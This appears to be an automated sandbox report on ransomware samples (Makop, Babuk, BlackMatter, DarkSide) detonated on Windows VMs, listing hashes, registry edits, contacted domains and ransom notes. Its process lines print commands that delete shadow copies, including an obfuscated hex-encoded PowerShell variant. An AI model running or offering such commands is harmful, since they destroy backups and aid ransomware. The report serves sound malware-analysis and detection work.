| SHA256 | ba5a59d879c1f6543b46085d02f5c90fdb22e663487d3586b6533cd887c83b72 |
| SHA512 | 947da2e85f5c21e7847f10d727729915973c911a47de233ef1fb97f60ae41db05f4c8c0ee655e3aa264db2067763e4134b76279f1d3ea8ad43640a64176522a3 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png
| MD5 | 808e7aedbb1da793b86c92816309035e |
| SHA1 | b4a2fca53290a35ae222f2cdf80f68ec7eab51e6 |
| SHA256 | a90f0edb8324760029a5db9f641b05694f8717c25514b2d6abde7662c827e0cb |
| SHA512 | 0af4e6a83661378b618c40de02c6cb7244be544dcb02f1f14c83b6abd791fa0330b6d508c86f0ba8e345608639d8505a2f26d3a6d3ae201bb01319c10c212d4a |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\ui-strings.js
| MD5 | 5c1dc195043bdea8525930a9882c10d7 |
| SHA1 | 17415e551255ab016f7682d7b33451cfcb91e687 |
| SHA256 | 019bad9e72430b758828953e3310007695c55fed1d25fdd707c76fec561f2bc5 |
| SHA512 | e912b84e9b4856864d302154b68adf6822189aa78859265cf8f529279e77a9d7c086452b4527ebb75d9c910ad9a6a1e95e1f45498fc168628da80739acff742e |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]
| MD5 | 8db5f9dff9d857a8827ea6d66fea4880 |
| SHA1 | ef5de087109543e49ee7fe70adb49efe27e15121 |
| SHA256 | e8c6ae3d3f05d53d58200db3f31383861d434c6abbf66f82e925321029058a10 |
| SHA512 | 70723910b4bf8814f848e10390378d53d9fb67e8a319edb708edc41b5c858c1d2cfc0b86a2909e33f72062df8b32e70554fa5ebe7aad7ec474ad78087560069b |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ui-strings.js
| MD5 | 4e6de5201d795432e75c0628dd306b26 |
| SHA1 | 80ae62145f6bc55c2a25f68ad9d6bc9fcae496db |
| SHA256 | 1265f683d27701f95b545e6201577fb4eadf5dcfbc1fc8cedb8dd39635515788 |
| SHA512 | 950227253fb845bd9a4519a209d72404760492473bda8101d846ded18aef1a2f6f6ab99b1b1b2186c0eed423c151c089316e124384f214644632e6a0f4dbece3 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main-selector.css
| MD5 | 89728f1ec13231dd11d2ea20afe39d67 |
| SHA1 | b4350cd128350483be389b2c865633bd1ae0f78b |
| SHA256 | aff85e66d5b690dc0188f4c2348ca78abdc14605286128407242a4e91a684754 |
| SHA512 | 58203e9c3898367c78c6d10fa629c0bd2356b2ae54e225afbcee83be1d5d297977a5a9633e773ffc2b8079a6e2eb2aa0afc530c27d29f512af40d8c9ae539adb |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png
| MD5 | a93c09c1a326a8733b4eceb713ca7457 |
| SHA1 | 90ba7a4c24bb0d424abda46b736170ea3b43e541 |
| SHA256 | d03f54aaa9216f4e32053928ce87a317341232f107140c84f73b2b6490b5a81a |
| SHA512 | 432c3400257d00391baa255d32fd03e0b8c97231d684ef35534868a38bcbf9cb70b433eacfe154c25fd3376e69592a7000a823535700f353975572c5101a56af |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\ui-strings.js
| MD5 | fc4cdc00064f47d2eedf58bd02068fe1 |
| SHA1 | cbb7157d8c560e9b2cdffac3a2b831202d76d2e6 |
| SHA256 | 0e8fb0e6e1dd239a2a1996059914a5ec5e753782527c1a07c62d808eb77df3e0 |
| SHA512 | 753d312596fdd24d3ad87b7916c5d108d185b42beff7c750099aecb38c7a321ff04260c19492d18cc27cf8f8843c6b3facde0934e67a46e9ce4291c3646abbe8 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ui-strings.js
| MD5 | c5596fa17e59cbf92a2ea2e1ad5c6f8b |
| SHA1 | 4153a71b5750685afba568403ed7522e83a9894f |
| SHA256 | 5812ebbc6311c0ff9919a27137b22435cbca3cb9fd56959b44ddb82f93609b99 |
| SHA512 | 762580962300f0e0501054450772ed59cdfec76d7aa6b1944f557ccd74ec2fcd171ffd67765f2b367c526d0193eabd184f0d4ac1dadb7a0d25f00f9866f670bc |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js
| MD5 | 26645133c9de7799e35cee0e47b82ee0 |
| SHA1 | bb6be735f6814d765bbe6b3f3ce034d1767366c5 |
| SHA256 | 1180e5728ff28a49eec43c61f15d49541419e79397ae58479db67b533d292d36 |
| SHA512 | c466dc886b25fea5a0e16aec28a4e784afe797f3937c7863788d0e5fa41414346bb17546d49178a48815debcca50aec3acabadc1f508fe0a3207008bc722608e |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png
| MD5 | cc62ce00dfbe76fd8affad9c89fced8c |
| SHA1 | 75d64cc57ff45a50c066f882bfd8e3845f8fa323 |
Analysis: behavioral32
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:14
Platform
win10v2004-20240704-en
Max time kernel
1660s
Max time network
1157s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3820 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe |
| PID 3820 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe |
| PID 3820 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3820 -ip 3820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 948
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsvACBC.tmp\System.dll
| MD5 | fccff8cb7a1067e23fd2e2b63971a8e1 |
| SHA1 | 30e2a9e137c1223a78a0f7b0bf96a1c361976d91 |
| SHA256 | 6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e |
| SHA512 | f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c |
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240704-en
Max time kernel
1559s
Max time network
1569s
Command Line
Signatures
Babuk Locker
Deletes shadow copies
Renames multiple (450) files with added filename extension
Enumerates connected drives
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
Network
Files
\Device\HarddiskVolume1\Boot\cs-CZ\How To Restore Your Files.txt
| MD5 | b6e97028103bc6b18214f4b2bd0e0d23 |
| SHA1 | 4c202c77782d55af635c28fa71b2ba58b294415e |
| SHA256 | db1c8cafdedfc4be8dd6b81aa086b998ae49ad929b8a260d4030c7b5ca373a45 |
| SHA512 | 214f7e9354a76f031bc3d28c6c20b3d5fafed32e5cb2d7414b7c2d185637d2f47e3538b62c722ba8b018cb3e6e3d9ff11bd6437d3f2af8eca9cd8504eb8c0f7d |
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1584s
Max time network
1570s
Command Line
Signatures
Babuk Locker
Deletes shadow copies
Renames multiple (1641) files with added filename extension
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Restore Your Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | N/A |
Reads user/profile data of web browsers
Enumerates connected drives
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5040 wrote to memory of 936 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | C:\Windows\System32\cmd.exe |
| PID 5040 wrote to memory of 936 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | C:\Windows\System32\cmd.exe |
| PID 936 wrote to memory of 3592 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 936 wrote to memory of 3592 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 5040 wrote to memory of 952 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | C:\Windows\System32\cmd.exe |
| PID 5040 wrote to memory of 952 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | C:\Windows\System32\cmd.exe |
| PID 952 wrote to memory of 3052 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 952 wrote to memory of 3052 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
Files
\Device\HarddiskVolume1\Boot\da-DK\How To Restore Your Files.txt
| MD5 | b6e97028103bc6b18214f4b2bd0e0d23 |
| SHA1 | 4c202c77782d55af635c28fa71b2ba58b294415e |
| SHA256 | db1c8cafdedfc4be8dd6b81aa086b998ae49ad929b8a260d4030c7b5ca373a45 |
| SHA512 | 214f7e9354a76f031bc3d28c6c20b3d5fafed32e5cb2d7414b7c2d185637d2f47e3538b62c722ba8b018cb3e6e3d9ff11bd6437d3f2af8eca9cd8504eb8c0f7d |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat
| MD5 | 7c39bb1f4920be2be02ae6ad4fefd614 |
| SHA1 | 3fe56e7fcbde259aba45ad36c95265bb0d3746ab |
| SHA256 | b5a0040ff5d4baccac5aff5b5fe8526f5846bf393ba6bc9c393f15a8a04a75ae |
| SHA512 | 1af7546ca3565087412d9640a81a20e51e0cc01c9399a0f602f72593e950715ac46a32de0b9e234e352debfb967a2c00bba8b711ae8dc7cfc3935d6e78107568 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat
| MD5 | 931cfaf9eaab8a1c9aaeeb81c308b20b |
| SHA1 | 61f5233b87497ca7db82b65cc8b7859543bf401a |
| SHA256 | 8860ba65755bc59c3068fd49262d3e95050741284a1969dd9b3aa45adf152b1b |
| SHA512 | 885d124cce3056bc2d4aa2669219d4b40249bb5eaec2630974763881ff3633d455582cc5a66697f96fdad2424ed7b20595c1793cd46c6b8acd5721fe3c1f53fd |
Analysis: behavioral12
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1778s
Max time network
1153s
Command Line
Signatures
BlackMatter Ransomware
Renames multiple (153) files with added filename extension
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\YgLqz8iqA.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\YgLqz8iqA.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | paymenthacks.com | udp |
| US | 204.11.56.48:443 | paymenthacks.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 204.11.56.48:80 | paymenthacks.com | tcp |
| US | 8.8.8.8:53 | mojobiden.com | udp |
| US | 15.197.148.33:443 | mojobiden.com | tcp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.56.11.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.148.197.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 15.197.148.33:80 | mojobiden.com | tcp |
| US | 204.11.56.48:443 | paymenthacks.com | tcp |
| US | 204.11.56.48:80 | paymenthacks.com | tcp |
| US | 15.197.148.33:443 | mojobiden.com | tcp |
| US | 15.197.148.33:80 | mojobiden.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
memory/4484-1-0x0000000002E70000-0x0000000002E80000-memory.dmp
memory/4484-0-0x0000000002E70000-0x0000000002E80000-memory.dmp
C:\YgLqz8iqA.README.txt
| MD5 | f66968c47a64569e2281f65a95991be0 |
| SHA1 | ef9e3e80bfbea4c3021b226cb8cd00687013b8a8 |
| SHA256 | 4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf |
| SHA512 | cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24 |
memory/4484-227-0x0000000002E70000-0x0000000002E80000-memory.dmp
memory/4484-226-0x0000000002E70000-0x0000000002E80000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240705-en
Max time kernel
1560s
Max time network
1578s
Command Line
Signatures
DarkSide
Renames multiple (153) files with added filename extension
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f0e1586e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f0e1586e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f0e1586e.ico" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.f0e1586e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.f0e1586e\ = "f0e1586e" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2380 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2380 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2380 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2380 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 13.248.169.48:443 | catsdegree.com | tcp |
| US | 13.248.169.48:443 | catsdegree.com | tcp |
Files
memory/2380-0-0x0000000001350000-0x0000000001367000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabC62.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarCB3.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/1760-40-0x000007FEF518E000-0x000007FEF518F000-memory.dmp
memory/1760-41-0x000000001B580000-0x000000001B862000-memory.dmp
memory/1760-42-0x00000000027A0000-0x00000000027A8000-memory.dmp
memory/1760-43-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/1760-44-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/1760-45-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/1760-46-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2380-47-0x0000000001350000-0x0000000001367000-memory.dmp
memory/1760-49-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 91a207778ee0970b4289a281bc319e08 |
| SHA1 | 7af869acec9a13181b41df5014599d0e0494f1ed |
| SHA256 | 1ced3b518f4d7b84f40fcd894713af12a97ae9732cabee15b35944b10593d224 |
| SHA512 | ee6613e6e10a06269720b6ce25e271751d45327b11b7cde4fab5161dc8e41105ba8161f8f91c98f66440800ad19a6e189219f6328b5427f24913357fe8dda4ca |
C:\Users\Admin\README.f0e1586e.TXT
| MD5 | f418a249405444da33cc73b402a26306 |
| SHA1 | 1a6c493e74036f93f0dae4b65e6c543c213ce418 |
| SHA256 | b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09 |
| SHA512 | b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf |
memory/2380-188-0x0000000001350000-0x0000000001367000-memory.dmp
